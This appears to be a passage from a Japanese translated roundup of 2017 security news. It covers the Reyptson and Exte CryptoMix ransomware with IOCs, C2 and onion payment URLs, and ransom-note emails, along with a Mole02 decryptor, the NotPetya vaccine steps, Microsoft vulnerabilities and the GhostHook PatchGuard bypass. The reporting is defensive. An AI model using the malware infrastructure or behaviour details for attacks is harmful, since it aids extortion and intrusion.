     これらのスパムeMailは、Folcan S.L. Facturacion(oは、oにアクセント)の件名を持ち、インチキの送り状を含んでいる。この送り状は、スペイン語で書かれており、送り状をダウンロードするにはリンクをクリックするように受取人に告げている。受取人が、このリンクをクリックすると、factura.pdf.rarと名付けられた、ファイル(実行ファイルを含む)をダウンロードする。この実行ファイルが開かれると、ユーザは、この身代金要求型マルウェアで感染させられることになる。


    送信されるeMail(画像をクリックすると拡大します)

    Reyptson身代金要求型マルウェアがコンピュータを暗号化している方法

     犠牲者がReptson身代金要求型マルウェアを実行したのだが、犠牲者はPDF送り状を開いていると思い込んでいる。開いてしまうと、この身代金要求型マルウェアは、リモート コマンド&コントロール サーバ(以下、C2)に接続し、システムのボリュームシリアル番号(【訳注】 Windowsが、1つのディスクを複数の異なるドライブのように使うためのボリュームを識別するために付ける一意の番号(コトバンクより))、犠牲者のログイン名、現在時刻のミリ秒の値で構成される一意のID文字列を送信する。
     このリクエストを送信している時、この身代金要求型マルウェアはまた、UJBTFityの名前とKuyfibvUYFOUygonULIHLuhgoYUHGVの値でクッキーを設定し、同様に、C2サーバにこれを送信する。このクッキーが何に使用されるのかは不明であるが、おそらくRaaS実装用のアフィリエイトIDだろうか?
     そこでC2は、暗号化パスワードと、犠牲者が支払い用サーバにログインするために使用するユーザ名とパスワードで構成される文字列を戻してくる。
     この身代金要求型マルウェアが、この情報を受け取ると、以下の拡張子を含むファイルを検索することで犠牲者のコンピュータの暗号化を開始する。

    .doc, .dot, .wbk, .docx, .docm, .dotx, .dotm, .docb, .xls, .xlt, .xlm, .xlsx, .xlsm,
    .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx,
    .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .accdb, .db, .accde, .accdt, .accdr, .pdf,
    .ani, .anim, .apng, .art, .bmp, .bpg, .bsave, .cal, .cin, .cpc, .cpt, .dds, .dpx,
    .ecw, .exr, .fits, .flic, .flif, .fpx, .gif, .hdri, .hevc, .icer, .icns, .ico, .cur,
    .ics, .ilbm, .jbig, .jbig2, .jng, .jpeg, .jpeg, .2000, .jpeg-ls, .jpeg, .xr, .kra,
    .mng, .miff, .nrrd, .ora, .pam, .pbm, .pgm, .ppm, .pnm, .pcx, .pgf, .pictor, .png,
    .psd, .psb, .psp, .qtvr, .ras, .rbe, .jpeg-hdr, .logluv, .tiff, .sgi, .tga,
    .tiff, .tiff, .ufo, .ufp, .wbmp, .webp, .xbm, .xcf, .xpm, .xwd, .cpp, .h, .cs,
    .sln, .idb, .txt, .dat

     一致するファイルに遭遇し、孫ファイルが以下のフォルダの一つに存在していなければ、この身代金要求型マルウェアは、AES-128暗号化を使用して暗号化する。

    c:\windows, c:\windows.old, c:\users\default, c:\users\all users, c:\users\public,
    c:\program files, c:\$recycle.bin, c:\program files (x86), c:\programdata,
    c:\system volume information, %UserProfile%\appdata

     ファイルを暗号化している時、この身代金要求型マルウェアは、暗号化したファイルに .Reyptson 拡張子を追加する。例えば、test.pngと名付けられていたファイルは、暗号化されると test.png.Reyptson にリネームされる。


    Reyptsonに暗号化されたファイルのフォルダ(画像をクリックすると拡大します)

     ファイルを暗号化している時、この身代金要求型マルウェアまた、暗号化されたファイルの存在する夫々のフォルダにComo_Recuperar_Tus_Ficheros.txtと名付けた脅迫文を作成する。


    脅迫文(画像をクリックすると拡大します)

     不当なメッセジを表示するために、この身代金要求型マルウェアはPDFリーダを起動し、インチキのPDFファイルを開く。これは、犠牲者が開いたファイルがPDFであったということを、犠牲者により確信をさせるためである。
     その直後に、この身代金要求型マルウェアは、%AppData%\Spotify\SpotifyWebHelper\SpotifyWebHelper.exe を起動する。これは、支払いサーバへのアクセス方法をに関する情報を含むロックスクリーン/脅迫文を表示する。


    Reyptsonロック画面(画像をクリックすると拡大します)

    Reyptson支払いサーバ

     脅迫文もロック画面も、犠牲者が支払い指示を得るためにログインしなければならないTor支払いサーバへのリンクを含んでいる。当初、身代金額は 200ユーロ(25875円)に設定されており、72時間後には 500ユーロ(64680円)に増加する。身代金をBitcoinではなく現実の貨幣で要求することは、犠牲者を混乱させるだけになるので、新人の行為である。


    支払いサイト その1(画像をクリックすると拡大します)


    支払いサイト その2(画像をクリックすると拡大します)

     犠牲者のログインページの下部に、犠牲者が、この身代金要求型マルウェア開発者とコミュニケーションを採ることを可能にするサポートフォームも存在している。この機能が現在動作するか否かは不明である。
     既に述べたように、この時点でReyptsonによって暗号化されたファイルを復号する方法はないが、この身代金要求型マルウェアでの支援を必要とするのであれば、あなたは、我々のReyptson Support & Help Topicで尋ねることができる。

    IOCs

    ハッシュ:
    SHA256: e6d549543863cd3eb7d92436739a66da4b2cc1a9d40267c4bb2b2fa50bf42f41

    ネットワーク コミュニケーション
    http://www.melvinmusicals.com/facefiles/
    http://37z2akkbd3vqphw5.onion/?usuario=[user_id]&pass=[password]
    http://37z2akkbd3vqphw5.onion.link/?usuario=[user_id]&pass=[password]

    Reyptson身代金要求型マルウェア関連ファイル
    %AppData%\Spotify\
    %AppData%\Spotify\SpotifyWebHelper\
    %AppData%\Spotify\SpotifyWebHelper\dat
    %AppData%\Spotify\SpotifyWebHelper\fin
    %AppData%\Spotify\SpotifyWebHelper\Reyptson.pdf
    %AppData%\Spotify\SpotifyWebHelper\Spotify.vbs
    %AppData%\Spotify\SpotifyWebHelper\SpotifyWebHelper.exe
    Registry Entries associated with the Reyptson Ransomware:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Spotify Web Helper v1.0      %AppData%\Spotify\SpotifyWebHelper\Spotify.vbs


    新たなExte CryptoMix身代金要求型マルウェアの変種がリリースされた
    BleepingComputer : News>Security (2017/07/14)
     昨日、Malwarebytesのマルウェア研究者Marcelo Riveroは、暗号化したファイル名に .EXTE を追加するCryptoMix身代金要求型マルウェアの新しい変種を発見した。この記事は、この新しい変種に関連する情報の概要を簡潔に提供するものである。
     我々は常に弱点を探しているので、あなたが、この変種の犠牲者であり、身代金を支払うことを決定したのであれば、我々が、どうか、この復号プログラムを我々に送って欲しい、そこで我々は、その復号プログラムを調査することができる。あなた方はまた、我々の専用のCryptomix Help & Support Topicで、CryptoMix身代金要求型マルウェア感染に関する論議やサポートを受けることができる。

    Exte CryptoMix身代金要求型マルウェア変種での変更点

     全体的な暗号化方法は、この変種でも同じであるが、幾つかの相違がある。何よりもまず、_HELP_INSTRUCTION.TXTと名付けられたファイルでの新しい脅迫文がある。この脅迫文は、支払い情報に関してexte1@msgden.net, exte2@protonmail.com, もしくは exte3@reddithub.com の何れかに接触するように指示している。


    Exteの脅迫文

     次の際立った変更は、暗号化されたファイルに追加される拡張子である。この変種では、ファイルが暗号化されると、ファイル名が改竄され、暗号化されたファイルには、.EXTE 拡張子が追加される。例えば、この変種によって暗号化されたテスト ファイルは、32A1CD301F2322B032AA8C8625EC0768.EXTEの名前になった。


    暗号化されたExteファイルのフォルダ

     興味ある点の一つは、この変種が、以前のAZER種と同様に、同じ10個の公開RSA鍵の使用を継続していることである。これらの鍵の一つは、犠牲者のファイルを暗号化するために使用されたAES鍵を暗号化するために選択されるだろう。これは、この身代金要求型マルウェアがネットワーク コミニケーションのない完全なオフラインで動作することを可能にしている。
     これは、この新しい変種の大雑把な解析に過ぎないので、他に何かが発見された場合には、我々は、この記事を必ずアップデートするだろう。

    IOCs

    ファイル ハッシュ: SHA256:
    6211fdd680208f94aa0149619facc0de8b51e6cb98108132d539469f3affa712
    Exte CryptoMix変種に関連したファイル名:
    _HELP_INSTRUCTION.TXT
    %AppData%\[random].exe
    Exte脅迫文:
    Hello!
    Attention! All Your data was encrypted!
    For specific informartion, please send us an email with Your ID number:
    exte1@msgden.net
    exte2@protonmail.com
    exte3@reddithub.com
    We will help You as soon as possible!
    DECRYPT-ID-[victim_id] number
    Exte身代金要求型マルウェアに関連したeMailアドレス:
    exte1@msgden.net
    exte2@protonmail.com
    exte3@reddithub.com
    同梱されている公開RSA-1024鍵:
    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfBni3t7uANs2aVmoh33h/gUlA
    UMlLAIYgjIQx0cdategi5Gs6SubFxGLoJgjR1TkYXnhB9UxlKCqsAaKSAegQMLRM 7HN/h6eZN7PaLMfFf/
    aJgZJe0FuaV/CABEvGopt5VqR3GJLzhgl/qttgsCTQcPFC G4gRBgdJ0Uqdq6Pe1wIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTp02+iahQUVQQSGTYcAgUdyn8 R6D3+q/
    M1GwA4c6ePwXlsEJC8UC4hDE4otjs4Vae0MauQrvkYo2rnilCpiqsv0Oo
    OjDgOHhHI1vUILpWjAVRu61DORWqdvQEH3x9GfGRIulKwhVdzll5sGS9pyGWAAGq XvJ8T/ods5V
    +M3nFvQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2Zs4/PG+bhEhduEnmB/zS4Ps7
    bD0EDn6q2tgpIwu7WF4NhDwnCQYeX9uweOs+x3pPKIHgZj7KtyOdwjJEMYt4yago
    kMnp24CM413CbGz28tsSLifJpcDq7NdFlItv1foqE3EhxK4RnnsKRnlNnZOmJobj
    BXWAK7kI6PMjAsycjQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdcVWIUztGfqsyayX8MJ+MilwA OCMmaedwUkhcrOaZbEr/
    kjFAS/51dhxfUmoO2M6N51D1+Tlx1hFP0Bbea41ory14 /jXmBP/
    ARTPejT9wmAcdFSYL5RKqn21imymnSfllV7lLSS7fwzIhUibz/c13pk1w UFQpsQKlAmge6nPWMQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCoXHPF5pGepB37MwkGshTi4N+q
    KaRbRAk6b6tDUxHK8AWyNDJTFKLygvaNTxjAcpY467SDTXQq6EyvaCh2juaSzCLH
    qxcwIVRMH4mtBI8RKx5bycWssbuZD6XwQpcS7WABqE8+BuYDmALgeh1W0UVBQge5
    Alv8dKw5oY2B84RApQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfshy8WocDLQBfn36LclXu7obD
    X5hCJFAKntVU3Siyy6XKnumyu/qsiwekxG0QkDrEuWZWGk+/w5qVf+bw1wXbKnBr
    h2FiYqtXgN8pX7h6vDhYNWd80RKg0fxA7sRYoB7HCtel99BCcGOKvWbsr9hcFq3j
    EPtf81OdtqlTI6x6uwIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3ncKb3ppnuXs7NtizXtdHcKcj
    sfSIhS3E23j5Z4pxYfj3c3ipP8/gxu93/9b6qSQnQ87NRACf8NBbpr1XYR1kGkNK cRk
    +u1QsKsVyYP8QoMtnCPbxaIAxZ9qc2o8eFPt44IbOFNo4TS682ZnrgvCIl/D+ taf9I8jbrBTSbfxQ3wIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNdG6Kp5B6EHKVsENf2QudkLfe
    TMzETNDGBk5cvGpj3On70vZGODVj/WfRe2iHyVE0ykT/iXXtb/C5gw3FePCSGVja
    5S3qH9xh6Ncw5sFrsdgBbm7qPYSbRmux2VTjHlLE44ckkTTCSiTUL3KX/08cU04V hb/
    JtNwKF5bg3ycuhQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqqapIMkQJgyt8mfVLZRPIEU20 V8c3
    +JbWNCdtDrIucv5nsKxJ/hCCDCau8gVjNN5jWtLltoQ0NvwR94HZaUkXAjGq Iy+vvpc66SBLin8pJ/
    DzLtA3ouQBrYU2/9C75DrKGuCedEoAzoFkCjz/AokqjTkz xSIkf+5//Rpoj22lHwIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHZ0EKaGTzyOxqaX2ePqAs46RU
    HhLRsApVWfO0z3BADXv4cv2iGjSXRZE1g7dU/KNEVZrjuBRaHksWpXKIwI6v7vSJ ZcxsaNRZNS
    +RTwJbu5VNc5uHBc5YPa7sdqocVrt3b6eXXPbn5gZcQY3L18TTd+S3 DljCC6h8BC80BJI6OQIDAQAB
    -----END PUBLIC KEY-----

    -----BEGIN PUBLIC KEY-----
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCkrR8CoTgor4sIybnVarCSWzMN
    RIoH51qIgCWDx49UQYXXqCn7I4T2XL7iOD5Fb/LO8LLS/BC7xNETIBGwUsOLMUXq
    0LT3wlASZX4l491JPAAzlGfspmWqOnxwFZh4e2kqbix9uTGRw7oC0v7n6pACJSLW
    ybODvrXAfJlITYUYIQIDAQAB
    -----END PUBLIC KEY-----


    Mole02 CryptoMix身代金要求型マルウェア変種用の復号プログラムがリリースされた
    BleepingComputer : News>Security (2017/07/05)
     身代金要求型マルウェアでファイルを暗号化された犠牲者に対して無料の復号プログラムをアナウンスできることは常に大変喜ばしいことである。本日の場合は、Mole02 CryptoMix身代金要求型マルウェア変種用の復号プログラムのリリースである。この復号プログラムは、Secarma Threat IntelチームのCharley Celiceの支援でSTIGroup, Ltdのセキュリティ研究者M AVによって作成された。
     この復号プログラムを使用するには、Mole02種の犠牲者は、無料でファイルを復元することが可能である。この復号プログラムの使い方に関する説明は、以下に見出すことができる。この復号プログラムの使い方をサポートしてもらう必要のある者は、Mole02/CryptoMix Help and Support Topicで質問しなさい。

    Mole復号プログラムを使用して.Mole02 に暗号化されたファイルを復号する方法

     Mole02 CryptoMix身代金要求型マルウェア種の犠牲者は、暗号化されたファイルが、[変更されたファイル名].MOLE02のフォーマットにリネームされていることで特定される。例えば、暗号化されたファイルは、26E14BA00B70A5D0AE4EBAD33D3416B0.MOLE02 のような名前になっている。暗号化されたファイルのフォルダの例は、以下のようになる。


    .Mole02に暗号化されたファイル(クリックすると拡大します)

     この復号プログラムの使い方は大変簡単である。プログラムをダウンロードし、それを実行すると、ファイルを復号するためにドライブのスキャンが始まる。
     最初のステップは、以下のリンクからMole02復号プログラムをダウンロードすることである。ダウンロードしたら、パスワードfalsepositiveを使用して解凍し、このプログラムを実行する。

    MOLE02復号プログラム ダウンロード

     実行すると以下に示す画面が表示される。


    .Mole02復号プログラム(クリックすると拡大します)

     このプログラムが実行されている間、このプログラムが何をしているかというような一切の指示は表示されない。このプログラムが終了し、あなたのファイルが復号されるまで(私のテストでは以下)放置しなさい。


    復号されたファイルのフォルダ(クリックすると拡大します)

     これでファイルは復号されたので、あなたはコンピュータからこの復号プログラムを削除することができる。この復号プログラムに関して何らかの質問があるのなら、Mole02/CryptoMix Help and Support Topicで遠慮無く質問しなさい。


    大流行しているPetya(NotPetya)身代金要求型マルウェアに対するワクチン(キルスイッチではない)が発見された
    BleepingComputer : News>Security (2017/06/27)
     Cybereasonのセキュリティ研究者Amit Serperが、Petya(NotPetya/SortaPetya/Petna)身代金要求型マルウェアによるコンピュータ感染を防御する方法を発見した。
     この身代金要求型マルウェアは、ハードドライブのMFTやMBRセクションをロックし、コンピュータをブートできないようにして、今日世界に大災害をもたらしている。犠牲者は、身代金の支払いを選択した(もはや無意味であり、推奨されない)場合を除いて、彼等のシステムを復元する方法は存在していなかった。


    NotPetya身代金要求画面(クリックすると拡大します)

     この攻撃が始まってから数時間のうちは、研究者は、この新しい身代金要求型マルウェアが、古い脅威であるPetyaの新しいバージョンであると確信していたが、その後、この身代金要求型マルウェアが、完全に新種の株であることを発見した。この新たな身代金要求型マルウェアは、Petyaからコードの一部を借りていることが、NotPetya, Petna(我々は、SortaPetyaと呼びたいと思う)と最近呼ばれるようになった理由である。

    研究者達は群がってKillswitchメカニズムを発見しようとした

     この身代金要求型マルウェアの拡散が全世界的であったために、多くの研究者が、暗号化の穴や、WannaCryのような、拡散を停止させるであろうキルスイッチ(無効化措置)ドメインを発見することを期待して、このマルウェアの解析に群がった。
     この身代金要求型マルウェアの内部動作を解析している間に、Serperは、NotPetyaがローカルファイルを検索し、そのファイルが既にディスク上に存在していたなら、暗号化のルーチンを実行していることを最初に発見した。
     この研究者の初期の所見は、PT Security, TrustedSec, Emsisoftのような、他のセキュリティ研究者によって、追認された。
     これは、犠牲者が、彼等のPCにそのファイルを作成し、そのファイルを読み込み専用に設定することで、NotPetya身代金要求型マルウェアの実行を防止できることを意味している。
     これは、この身代金要求型マルウェアが実行することを防止するので、この方法は、キルスイッチ(無効化措置)ではなく予防接種である。これが、各コンピュータユーザが、個々にこのファイルを作成しなければならない理由である。グローバルな全ての身代金要求型マルウェア感染を防止するために、この身代金要求型マルウェアの開発者がONにできた「スイッチ」と比べなさい。

    NotPetya/Petna/Petya ワクチンを有効にするには

     あなたのコンピュータにワクチン接種は、あなたが、NotPetya/Petna/Petyaの現在の株に感染していた場合は不可能である。C:\Windows フォルダ中に perfc と名付けたファイルを作成し、このファイルを読み込み専用に設定しなさい。このタスクを実行する簡単な方法を望む人のために、Lawrence Abramsは、あなたに代わって、このステップを実行するバッチファイルを作成している。
     彼のバッチファイルは、perfc.dat と perfc.dll と名付けられた、二つの追加のワクチンも作成することに注意しなさい。私のテストでは、これらの追加のファイルを必要とはされなかったが、私は、このTweetへの返答に基づき、万全を期して、それらを追加した。
     このバッチファイルは、https://download.bleepingcomputer.com/bats/nopetyavac.bat に見出すことができる。
     コンピュータを手動で予防接種したい人に関しては、以下のステップを使用して実行することができる。これらのステップは、あまりコンピュータの経験がない人でもできるように、分り易く作成されていることに留意しなさい。経験豊かな人々に関しては、幾つかの、そして、多分より適切な方法で、これを実行することができる。
     最初に、ファイルの拡張子を表示するようにWindowsを設定する。この実行方法を知らない人に関しては、コチラのガイドを使用しなさい。フォルダ オプション設定で「登録されていない拡張子は表示しない」がチェックされていないことを確認しなさい。


    フォルダ オプション(原文は英語バージョンの画像ですが、Microsoft日本語サイトの画像に変更しています)

     拡張子の表示を有効にしたら(これは常に有効にしておくべきである)、C:\Windows フォルダを開きく。フォルダが開いたら、Notepad.exeプログラムが表示されるまでスクロールダウンする。


    Windowsフォルダ

     notepad.exeプログラムを見つけたら、その上を左クリックし、強調表示にする。[Ctrl]+[C]でコピーし、[Ctrl]+[V]で、これをペーストする。ペーストすると、ファイルをコピーするパーミッションの許諾を求めるプロンプトが表示される。


    パーミッションの許諾メッセージボックスは、日本語バージョンでは、以下の内容で表示される。
    タイトル: 対象のフォルダへのアクセスは拒否されました
    本文: このフォルダへ移動するには管理者のアクセス許可を提供する必要があります

     「続行」ボタンを押すと、このファイルは、notepad-Copy.exeとして作成される。このファイルを左クリックし、次に、キーボードの[F2]キーを押す。これで、notepad-Copy.exeのファイル名の変更ができるようになるので、以下の図に示したように、perfc とタイプする。


    ファイル名の変更

     このファイル名を perfc に変更したら、キーボードの[Enter]を押す。あなたは、このファイルの名前を変更したいのか否かを尋ねるプロンプトが表示される。

     「Yes(はい)」ボタンをクリックする。Windowsは再び、このフォルダのファイルの名前を変更するための許可を求めてくる。「継続」ボタンをクリックする。
     これで、perfcファイルが作成されたので、このファイルをRead Only(読み込み専用)に設定する必要がある。これを実行するには、perfcファイルを右クリックし、図に示したようにプロパティを選択する。


    一番下のProperties(プロパティ)を選択する

     このフォルダのプロパティ メニューが開く。一番下に、「読み取り専用」とラベルされたチェックボックスがある。以下の画像のように、このチェックボックスにチェックをいれる。


    読み取り専用属性の指定

     ここで、「適用」ボタンをクリックし、次に「OK」ボタンをクリックする。これで、プロパティウィンドウが閉じる。私のテストでは、私のコンピュータを予防接種するために必要な全てであったが、万全を期すために、同様に、C:\Windows\perfc.dat と C:\Windows\perfc.dll を作成することが提案されている。
     あなたのコンピュータは、これでNotPetya/SortaPetya/Petya身代金要求型マルウェアに対して予防接種された。


    Microsftは、Azure AD Connectに関する「重要な」セキュリティアップデートを発行した
    Kaspersky : ThreatPost (2017/06/28)
     Microsoftは、Azure Active Directory Connect製品のバグを顧客に警告している。このバグは、敵対者が権限の昇格を行い、パスワードをリセットし、ユーザのアカウントへの不正アクセスを取得することを可能にするものである。
     アドバイザリ(4033453)は、「重要」と評価される脆弱性としてMicrosoftのTechNet Webサイトに火曜日リリースされた。このアドバイザリは、この脆弱性に対する組織への影響の有無を決定する方法を含んでいる。問題の修正は、最新バージョンのAzure AD Connect(1.1.553.0)にアップグレードする方法を含んでいる。
     Azure Active Directory Connectは、Microsoftのツールであり、ローカル(オンプレミス)Active Directoryとクラウド ベースのAzure Active Directory(Azure AD)間のネットワーク同期の状態をモニタリングするためのものである。
     このアドバイザリによると、(【訳注】 以下「」内、Microsoft TechNetの原文のまま)「この更新プログラムは、Azure AD Connect のパスワード ライトバックを有効化する際に正しく構成されなかった場合に特権が昇格される脆弱性を解決します」とし、「攻撃者がこの脆弱性を悪用した場合、パスワードをリセットし、任意のオンプレミス AD の特権ユーザー アカウントに不正にアクセスする可能性があります」としている。
     Microsoftは、パスワードのライトバック機能は、Azure AD Connectのコンポーネントであると説明している。これを使用して、ユーザは、彼等のパスワードをオンプレミス AD ユーザ アカウントにパスワードを書き戻すように、Azure ADを構築することを可能になる。「オンプレミス AD 管理者が意図せずオンプレミス AD の特権アカウントに対してもパスワード リセット権限 (エンタープライズ管理者およびドメイン管理者のアカウントを含む) を Azure AD Connect に付与する可能性があります」と、このアドバイザリは記述している。
     このリスクは、悪意のある Azure AD 管理者が、パスワード ライトバックを利用して、任意のオンプレミス AD の特権ユーザー アカウントのパスワードを既知のパスワード値に書き換えた場合に存在する。これは、悪意のあるAzure AD管理者が顧客のオンプレミスActive Directoryへの特権の取得に導く可能性があると、Microsoftは発言している。
     この脆弱性に対する影響の検証は、パスワード ライトバックが有効化されているか否かを確認し、あなたのAzure AD Connectサーバにオンプレミス AD 権限アカウントに対するパスワードのリセット権限が付与されているか否かの評価を含んでいる。
     このアドバイザリによると、「AD DSアカウントが、一つまたは複数のオンプレミスADの特権グループのメンバーの場合、グループから、そのAD DSアカウントを削除することを検討してください」としている。このアドバイザリは、ステップを大変詳細に述べているが、この脆弱性を修正するには、Azure AD Connectの最新版にアップデートすることを推奨している。
     Azure AD Connectの脆弱性は、CVE同定子CVE-2017-8613が割り当てられている。


    MicrosoftはコッソリWindows Defender中のセキュリティホールを塞いでいた
    BleepingComputer : News>Security (2017/06/27)

     金曜日、Microsoftは、Microsoft Malware Protection Engine (MsMpEng、Microsoftエコシステム セキュリティサービスの中核)中の重大なセキュリティフローをパッチする緊急のアップデートをリリースしていた。
     CVE-2017-8558として追跡されるこのバグは、このMalware Protection Engineに含まれるx86エミュレータに影響を与えるものであり、Google Project Zeroの研究者Tavis Ormandyによって発見されていた。
     Ormandyの技術的詳細によると、この脆弱性は、攻撃者がユーザのコンピュータでコードを実行し、ローカルシステム権限を取得し、犠牲者のPCを制御することを可能にするものである。

    悪用はバカバカしいほど簡単

     このフローを悪用することは、攻撃者が様々な方法(eMail、チャット メッセージ、ファイルのダウンロード、もしくは、犠牲者を欺いて兵器化したJSファイルをホストしている悪意あるWebサイトにアクセスさせる)で不正な形式のファイルを犠牲者に送信することを要求するだけなので、バカバカしいほど簡単である。
     MsMpEngは、ユーザのPCに新しいコンテンツが到着すると直ちにスキャンするので、攻撃者は、ユーザとの対話的操作を必要とせずに、ターゲットのシステムを即座に掌握することができるだろう。
     これは、このMalware Protection Engineが、Windows 7 以降の全てのWindows OSバージョンに組み込みのサービスとして出荷されているために、そして、Windows Defender, Microsoft Security Essentials, Microsoft Endpoint Protection, Windows Intune Endpoint Protection, Microsoft Forefront Endpoint Protectionのような一連のMicrosoftのセキュリティ製品のコア コンポーネントであるために大きな問題である。このバグは、攻撃者がこれらのセキュリティ製品をクラッシュさせたりバイパスすることを可能にするだろう。
     アドバイザリで、Microsoftは、上述の製品の全てが、この問題の影響を受けると発言している。Microsoftは、Malware Protection Engineのバージョンを 1.1.13903.0 にコッソリとアップデートすることでこの脆弱性をパッチした。
     ユーザがアップデート管理ソフトウェアを介して、特にアップデートをブロックしている場合を除いて、Microsoft Malware Protection Engineは、ユーザとの対話を必要とせずに、それ自体をコッソリとアップデートしている。

    PoC(proof-of-concept、概念の実証)は、大変危険なので暗号化される必要があった

     Ormandyは、Microsoftの従業員のために、このフローをデモするproof-of-conceptファイルを組み立てた。当に、このバグが如何に危険であり、如何に悪用することが簡単なのかを示しているために、Ormandyは、Microsoftに、このPoCデモを送信するにあたり、このPoCがMicrosoftのシステムに到着した瞬間に、MicrosoftのeMailサーバをクラッシュさせる危険があったために、このPoCデモを暗号化した。
     これは、Ormandyが、PoCデモを暗号化した二回目のことである。5月初旬、Ormandyは、「大変酷いバグ」であり、「最近の記憶では、最悪のWindowsリモートコード実行」として説明した類似のバグを発見している。
     三週間後、彼の同僚の一人はまた、同じMsMpEngコンポーネントに影響を与える一連の問題を発見した。

    バグは数百万ドルの価値があっただろう

     これらのバグは全て、攻撃者にセキュリティサービスをクラッシュさせたりバイパスしたりすることが可能であり、ユーザのシステムを乗っ取ることが可能であるために、危険なものである。このようなことを実行できるリリースが、ハッキング フォーラムで売られたなら、地球上の全てのWindowsコンピュータにコッソリ侵入することが可能になるので、悪事の張本人は数百万ドルを手にしていただろう。
     Ormandyは、ファジング(ランダムなデータを取り出し、そのデータをプログラムのインプットに与えることで、ソフトウェアがどのように振る舞い、バグを吐き出すのかをテストすること)と呼ばれるテクニックを使用して、このバグを発見したと発言している。
     この冬の間ずっと、Ormandyは、Windows Defenderのバグをテストをするために、Linuxベースのファジングを使用できるように、Windows DefenderのDLLをLinuxに移植するためのツールを構築していた。彼は、特にWindows Defenderのバグをテストするためにこのツールを組み立てたと発言している。明らかに、このツールは動作し、Microsoft独自のファジングが捕獲できなかった問題を露出させた。


    CPUをクラッシュさせるIntelのバグに関して未だWindowsは修正を出していない
    BleepingComputer : News>Security (2017/06/27)
     一部のIntel CPUモデルは、一定の順序に従って操作が処理されている時に、コンピュータをクラッシュさせるバグの影響を受ける。
     このバグは、OCamlコンパイラに取り組んでいる開発者によって発見され、昨年Intelに通知された。Intelは、2017年の4月と5月にマイクロコード エラッタ(正誤表)の形式で、この問題に関する修正をロールアウトした。
     Intelは、Kaby Lake, Skylake, Xeon v5, Xeon v6, 一部のPentium と Core Xシリーズ v6 モデルが影響を受けると発言している。
     Intelは、この問題は「予想不能なシステム挙動を発生させるかもしれない」と発言し、Debian開発者は、このバグが「アプリケーションやシステムの不正な挙動、データ損壊、データ損失のような、不適切なエラーを発生させることができた」と、セキュリティアドバイザリで発言している。
     Linuxコンピュータの一部のベンダは、このIntel問題の修正を実装したBIOS/UEFIアップデートを既に出荷している。他方、Windows Updateでバグフィックスの兆候は未だに存在していない。
     その一方で、エキスパートは、ユーザにBIOSもしくはUEFI設定でhyper-threading(【訳注】 マイクロプロセッサの高速化技術(IT用語辞典より))を無効化するように推奨している。この方法は、CPUパフォーマンスを犠牲にしてバグを緩和する。
     IntelベースのPCに影響を与える不思議なクラッシュの相次ぐ報告は存在していないので、このバグは、記述している時点では、大きな問題になりそうにないが、ユーザは、高感度システへの重要なクラッシュを防止するために必須のステップの全てを取る必要がある。


    新たなGhostHook攻撃は、Windows PatchGuard防御をバイパスする
    BleepingComputer : News>Security (2017/06/22)
     セキュリティ専門家は、Windows PatchGuard防御をバイパスし、悪意あるコードをWindowsカーネルにフックする方法を発見した。これは、今まで難攻不落と考えられていたシステムに攻撃者がルートキットを仕掛けることを可能にする。
     PatchGuard(Kernel Patch Protection (KPP)の公式名で知られている)は、サポートされない方法でサードパーティーのコードをWindowsカーネルにパッチすることを妨げるためのWindows 64-bitエディションのセキュリティ機能である。
     Microsoftは2005年(Windows XPに端を発する)にPatchGuardを導入した。そして、この機能は、殆どのルートキットが64-bit Editionで動作することを妨げた。

    GhostHook攻撃は、Intel PT機能を悪用している

     本日、CyberArkのセキュリティ研究者達は、Intel CPUの機能を使用してPatchGuardを首尾よくバイパスするGhostHookと名付けた新しいテクニックに関する研究を公開した。
     研究者達によると、GhostHookは、Intel Processor Trace(デバッグ操作や悪意あるコードの検出を支援する目的で、現在のソフトウェア実行についての情報を捕獲するために専用のハードウェアを使用する)が稼働しているシステムに対してのみ動作する。
     通常、Intel PTオペレーションへの侵入は、PatchGuardが即座に検出しブロックする操作であるところの悪意ある機能をカーネルレベルのコード中にパッチすることを攻撃者に要求する。
     CyberArkの研究者達は、Intel PTのプロセス用に極端に小さなバッファを割り当て、そのCPU中では、パケットは、バッファスペースから逸脱するので、オーバーフローしているコードを管理するためにPMIハンドラが起動されることを発見したと発言している。
     この問題は、PatchGuardがPMIハンドラを監視していないことであり、攻撃者が、そのPMIハンドラを介してカーネル オペレーションにパッチするために彼の悪意あるコードを追加できるということである。
     これは、Windowsカーネルをパッチし、Windows 64-bitバージョンにルートキットを埋め込む非検出の方法を攻撃者に提供するものである。GhostHookは、Windows 10(2015年の夏にスタートして以来、ほんの2~3のルートキット以外は、効果的ではないことが証明されてきた)でも動作する。

    MicrosoftはGhostHook攻撃ベクトルをパッチすることはない

